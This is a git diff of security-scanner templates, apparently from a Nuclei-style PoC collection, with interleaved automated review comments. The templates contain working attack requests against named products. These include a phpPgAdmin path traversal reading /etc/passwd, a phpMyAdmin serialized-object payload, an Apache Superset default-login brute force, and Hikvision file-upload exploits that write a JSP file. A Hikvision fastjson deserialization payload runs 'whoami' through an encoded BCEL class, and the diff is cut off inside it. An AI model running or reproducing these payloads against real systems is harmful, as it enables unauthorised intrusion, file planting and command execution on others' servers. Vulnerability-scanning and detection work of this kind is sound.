diff --git a/date.txt b/date.txt
index 18af8d7e28..a1e4e7fb87 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240902
+20240903
diff --git a/poc.txt b/poc.txt
index 2f04f118f1..d8c41f4508 100644
--- a/poc.txt
+++ b/poc.txt
@@ -826,6 +826,7 @@
 ./poc/api/api-nytimes.yaml
 ./poc/api/api-onelogin-472.yaml
 ./poc/api/api-onelogin.yaml
+./poc/api/api-onyphe.yaml
 ./poc/api/api-open-page-rank.yaml
 ./poc/api/api-opengraphr.yaml
 ./poc/api/api-openweather-473.yaml
@@ -72591,6 +72592,7 @@
 ./poc/other/fast-velocity-minify-34342709323e9cee9cbfa898dc1ee0a1.yaml
 ./poc/other/fast-velocity-minify.yaml
 ./poc/other/fastadmin-framework.yaml
+./poc/other/fastbee.yaml
 ./poc/other/fastcgi-echo.yaml
 ./poc/other/fastdup-4d937436569e469e00e1b26c70c6dd2f.yaml
 ./poc/other/fastdup-d463033e6c4a961471bff9c9179f1c0e.yaml
@@ -79356,6 +79358,7 @@
 ./poc/other/meow-gallery-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/meow-gallery-plugin.yaml
 ./poc/other/meow-gallery.yaml
+./poc/other/mercurial-hgignore.yaml
 ./poc/other/mercurial.yaml
 ./poc/other/merge-minify-refresh-0c0b173e2bd6f7b85f9b9b87ba38121b.yaml
 ./poc/other/merge-minify-refresh-5b8fc85b1483f7f13e56a98101e86360.yaml
diff --git a/poc/api/api-onyphe.yaml b/poc/api/api-onyphe.yaml
new file mode 100644
index 0000000000..8e373aa19b
--- /dev/null
+++ b/poc/api/api-onyphe.yaml
@@ -0,0 +1,46 @@
+id: api-onyphe
+
+info:
+ name: Onyphe API Test
+ author: 0xpugazh
+ severity: info
+ description: Cyber Defense Search Engine and Attack Surface Management
+ reference:
+ - https://www.onyphe.io/docs
+ metadata:
+ verified: true
+ max-request: 1
+ tags: token-spray,onyphe
+
+self-contained: true
+
+http:
+ - method: GET
+ path:
+ - "https://www.onyphe.io/api/v2/user"
+
+ headers:
+ Authorization: Bearer {{token}}
+ Content-Type: application/json
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"apikey":"'
+ - '"apis":'
+ - '"@timestamp":'
+ - '"@category":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4b0a004830460221009fbed819ee5f0de6054a6047d01ebacb9d75d95720706390d43f106acab4f6dd022100fe6c8c822772b3c74bbdbda483facd2f7b9f791c446871c3de34417474affd3c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml
index e714f96cca..fda684a006 100644
--- a/poc/cve/cve-2008-5587.yaml
+++ b/poc/cve/cve-2008-5587.yaml
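Review bot: `description` in the new `info` block describes the vendor rather than what the template checks; suggest `description: Checks whether the supplied Onyphe API token is valid by requesting the /api/v2/user endpoint.` Because `self-contained: true` sends the token to a fixed third-party host regardless of the target list, the description should also state that the `token` value is transmitted to www.onyphe.io, so operators know where the credential goes. The `Authorization: Bearer {{token}}` header value is a plain scalar that parses correctly today, but quoting it as `Authorization: "Bearer {{token}}"` keeps it safe if the template variable is ever moved to the start of the value.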
@@ -1,27 +1,28 @@ id: CVE-2008-5587 - info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ + - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 + - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." - + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/cve/cve-2009-1151.yaml b/poc/cve/cve-2009-1151.yaml index cc013e8a10..3984eacf94 100644 --- a/poc/cve/cve-2009-1151.yaml +++ b/poc/cve/cve-2009-1151.yaml 
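Review bot: The new `classification` block carries only `cve-id`, while the sibling templates touched in this commit (cve-2018-1271, cve-2021-44451) also record `cvss-metrics`, `cvss-score` and `cwe-id`; this directory-traversal entry should follow the same shape, with `cwe-id: CWE-22` as the cve-2018-1271 template uses for the same weakness and the CVSS fields filled from the NVD record. `shodan-query: http.title:"phpPgAdmin"` lost the quotes the removed line had; the embedded `:"` is still read as a plain scalar because no space follows the colon, but `shodan-query: 'http.title:"phpPgAdmin"'` removes the dependence on that detail. The `requests:` block that follows `tags:` continues past the end of the hunk.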
@@ -1,21 +1,15 @@ id: CVE-2009-1151 + info: - name: PhpMyAdmin Scripts - Remote Code Execution + name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability author: princechaddha - severity: critical - description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + severity: high + description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 - - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301 - - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php - - https://nvd.nist.gov/vuln/detail/CVE-2009-1151 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2009-1151 - cwe-id: CWE-77 - tags: cve,cve2009,phpmyadmin,rce,deserialization,kev + + requests: - raw: - | @@ -26,13 +20,13 @@ requests: Content-Type: application/x-www-form-urlencoded action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/07/06 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 668fd715ec..0cf11fcf80 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml 
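Review bot: The new `info` block drops `tags` entirely, together with the whole `classification` block and three of the five references, so the template can no longer be selected by `cve`, `cve2009` or `phpmyadmin` tag filters and no longer links its `id` to the CVE record; keep at least `tags: cve,cve2009,phpmyadmin,rce` and a `classification:` block with `cve-id: CVE-2009-1151`. The severity downgrade from `critical` to `high` is left without the `cvss-score` that used to justify the rating, so a reader cannot tell whether it was deliberate. The second hunk in this file only adds spacing around `matchers-condition` and removes the trailing "Enhanced by" comment.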
@@ -1,10 +1,9 @@ id: CVE-2016-6210 - info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - + tags: cve,cve2016,network,openssh description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -16,18 +15,15 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml index ccf03eab13..548327e206 100644 --- a/poc/cve/cve-2018-1271.yaml +++ b/poc/cve/cve-2018-1271.yaml 
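Review bot: `tags: cve,cve2016,network,openssh` is inserted between `severity` and `description`, whereas every other template in this commit places `tags` as the last key of `info`, after `classification` and `metadata`; moving it there keeps the corpus consistent and diffable. The second hunk only removes blank lines and adds the missing final newline, which is fine.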
@@ -1,18 +1,20 @@ id: CVE-2018-1271 - info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - + description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + - https://pivotal.io/security/cve-2018-1271 + - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 + - https://access.redhat.com/errata/RHSA-2018:1320 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.90 + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." - + tags: cve,cve2018,spring,lfi,traversal requests: - method: GET path: diff --git a/poc/cve/cve-2021-44451.yaml b/poc/cve/cve-2021-44451.yaml index bc69c3ca6e..1d944fccd0 100644 --- a/poc/cve/cve-2021-44451.yaml +++ b/poc/cve/cve-2021-44451.yaml 
@@ -1,34 +1,42 @@ id: CVE-2021-44451 info: - name: Apache Superset Default Login + name: Apache Superset - Default Login author: dhiyaneshDK - severity: high - description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. - remediation: Users should upgrade to Apache Superset 1.4.0 or higher. + severity: medium + description: | + Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json + - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 - tags: apache, default-login classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 cve-id: CVE-2021-44451 + cwe-id: CWE-522 + metadata: + verified: true + shodan-query: http.favicon.hash:1582430156 + tags: cve,cve2021,apache,superset,default-login requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} + - | + GET /dashboard/list/ HTTP/1.1 + Host: {{Hostname}} + attack: pitchfork payloads: username: @@ -36,32 +44,25 @@ requests: password: - admin - extractors: - - type: regex - name: csrf_token - group: 1 - part: body - internal: true - regex: - - 'value="(.*?)">' - + req-condition: true + cookie-reuse: true matchers-condition: and matchers: - type: word - part: body - condition: and + part: header_2 words: - - 'Redirecting...' - - '

Redirecting...' + - 'session' - type: word - part: header + part: body_3 words: - - 'session' + - 'DashboardFilterStateRestApi' - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/02 + extractors: + - type: regex + name: csrf_token + group: 1 + part: body + regex: + - 'name="csrf_token" type="hidden" value="(.*)"' + internal: true diff --git a/poc/exposed/exposed-swagger.yaml b/poc/exposed/exposed-swagger.yaml index 9ba88813fb..4700911c23 100644 --- a/poc/exposed/exposed-swagger.yaml +++ b/poc/exposed/exposed-swagger.yaml 
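Review bot: The new extractor regex `'name="csrf_token" type="hidden" value="(.*)"'` uses a greedy `(.*)`, so if anything follows the closing quote on the same line the captured token will run through to the last `"`; the removed version used non-greedy `(.*?)`, and `value="([^"]*)"` is the most robust form. In the first hunk of this file the rewritten `info` block removes the `remediation` line without replacement, so the report no longer tells the reader how to fix the finding; keep `remediation: Users should upgrade to Apache Superset 1.4.0 or higher.` next to `description`. `description: |` also keeps a trailing newline on a single-sentence value, where `|-` (or a plain scalar, as the other templates on this page use) is the usual form. The `part: header_2` / `part: body_3` matchers depend on `req-condition: true`, which this hunk does set, so the indices are consistent with the three raw requests.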
@@ -13,19 +13,73 @@ info: requests: - method: GET path: - - "{{BaseURL}}/swagger/..;/swagger/index.html" - - "{{BaseURL}}/swagger-ui/..;/swagger-ui/index.html" - - "{{BaseURL}}/api/..;/api/" - - "{{BaseURL}}/api/..;/api/docs/" - - "{{BaseURL}}/api-doc/..;/api-doc" - - "{{BaseURL}}/api-docs/..;/api-docs" - - "{{BaseURL}}/docs/..;/docs/index.html" - - "{{BaseURL}}/api/..;/api/swagger-ui.html" - - "{{BaseURL}}/swagger/..;/swagger/ui/index" - - "{{BaseURL}}/api/..;/api/swagger/index.html" - - "{{BaseURL}}/v1/..;/v1/" + - "{{BaseURL}}/swagger/" + - "{{BaseURL}}/swagger/index.html" + - "{{BaseURL}}/swagger-ui/index.html" + - "{{BaseURL}}/swagger-ui.html" + - "{{BaseURL}}/api/" + - "{{BaseURL}}/api/docs" + - "{{BaseURL}}/api-doc" + - "{{BaseURL}}/api-docs" + - "{{BaseURL}}/docs/index.html" + - "{{BaseURL}}/docs/" + - "{{BaseURL}}/docs/swagger-ui.html" + - "{{BaseURL}}/api/swagger-ui.html" + - "{{BaseURL}}/swagger/ui/index.html" + - "{{BaseURL}}/swagger/ui/index" + - "{{BaseURL}}/api/swagger/index.html" + - "{{BaseURL}}/api/swagger/ui/index" + - "{{BaseURL}}/api/swagger-ui/index.html" + - "{{BaseURL}}/api/docs/index.html" + - "{{BaseURL}}/api/doc/index.html" + - "{{BaseURL}}/api/index.html" + - "{{BaseURL}}/api/v1/swagger/index.html" + - "{{BaseURL}}/api/v1/swagger-ui/index.html" + - "{{BaseURL}}/api/v1/swagger/ui/index" + - "{{BaseURL}}/api/v1/docs/index.html" + - "{{BaseURL}}/api/v1/docs/swagger-ui/index.html" + - "{{BaseURL}}/api/v1/docs/swagger/index.html" + - "{{BaseURL}}/api/v2/swagger/index.html" + - "{{BaseURL}}/api/v2/docs/swagger-ui/index.html" + - "{{BaseURL}}/api/v2/docs/swagger/index.html" + - "{{BaseURL}}/api/v2/swagger-ui/index.html" + - "{{BaseURL}}/api/v2/swagger/ui/index" + - "{{BaseURL}}/api/v2/docs/index.html" + - "{{BaseURL}}/api/v3/swagger/index.html" + - "{{BaseURL}}/api/v3/swagger-ui/index.html" + - "{{BaseURL}}/api/v3/docs/swagger-ui/index.html" + - "{{BaseURL}}/api/v3/docs/swagger/index.html" + - "{{BaseURL}}/api/v3/swagger/ui/index" + - 
"{{BaseURL}}/api/v3/docs/index.html" + - "{{BaseURL}}/docs/swagger-ui/index.html" + - "{{BaseURL}}/v1/swagger/index.html" + - "{{BaseURL}}/v1/api" + - "{{BaseURL}}/v1/swagger-ui/index.html" + - "{{BaseURL}}/v1/swagger/ui/index" + - "{{BaseURL}}/v1/docs/index.html" + - "{{BaseURL}}/v1/api-docs/index.html" + - "{{BaseURL}}/v2/swagger/index.html" + - "{{BaseURL}}/v2/api" + - "{{BaseURL}}/v2/api-docs/index.html" + - "{{BaseURL}}/v2/swagger-ui/index.html" + - "{{BaseURL}}/v2/swagger/ui/index" + - "{{BaseURL}}/v2/docs/index.html" + - "{{BaseURL}}/v3/swagger/index.html" + - "{{BaseURL}}/v3/api-docs/index.html" + - "{{BaseURL}}/v3/swagger-ui/index.html" + - "{{BaseURL}}/v3/api" + - "{{BaseURL}}/v3/swagger/ui/index" + - "{{BaseURL}}/v3/docs/index.html" + - "{{BaseURL}}/" + - "{{BaseURL}}/doc/" + - "{{BaseURL}}/v0/" + - "{{BaseURL}}/v1/" + - "{{BaseURL}}/v2/" + - "{{BaseURL}}/v3/" + - "{{BaseURL}}/api/schema/swagger-ui/" + matchers: - type: word words: - - "swagger-ui-" + - "Swagger UI" diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml 
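Review bot: The single word matcher `Swagger UI`, with no `part`, no status check and no `matchers-condition`, is now applied to very generic paths such as `{{BaseURL}}/`, `/doc/`, `/api/` and `/v0/`–`/v3/`, so any page that merely mentions Swagger UI (a docs page, a 404 body that echoes the product name) is reported as an exposed Swagger instance; add `matchers-condition: and` with a `type: status` matcher for `200` and put `part: body` on the word matcher to keep the exposure signal meaningful. The path list grows from 11 to roughly 65 entries (from the hunk counts), so if `info.metadata` carries a `max-request` value — that part of `info` is outside the hunk — it needs updating to match.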
@@ -1,20 +1,19 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - raw: - | - POST /center/api/files;.html HTTP/1.1 + POST /svm/api/external/report HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a @@ -25,11 +24,17 @@ http: <%out.print("test");%> ------WebKitFormBoundary9PggsiM755PLa54a-- - + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' condition: and diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml index 0ebd67934b..7e328a8b1b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml 
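Review bot: `info` still has no `tags` line, so this template — which writes `test.jsp` to the target in the first request and never removes it — cannot be excluded by the `intrusive` tag that the dahua template on this page used for the same kind of upload check; add `tags: hikvision,fileupload,intrusive` and say in `description` that the check leaves a file behind. The new DSL conditions `contains(body_1, "data")` and `contains(body_2, "test")` are satisfied by almost any response body that contains those words, including generic error pages, so the template will over-report; the removed `contains(body_1, "test.jsp")` was at least specific to the upload response. `id: HiKVISION` differs only in case from the `id: HIKVISION` used by the two other Hikvision templates in this commit, which invites confusion in reports and tag filters.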
@@ -1,27 +1,50 @@ id: HIKVISION info: - name: HIKVISION - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
